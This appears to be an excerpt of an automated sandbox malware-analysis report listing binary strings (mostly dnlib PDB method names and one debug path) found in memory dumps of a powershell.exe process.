                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
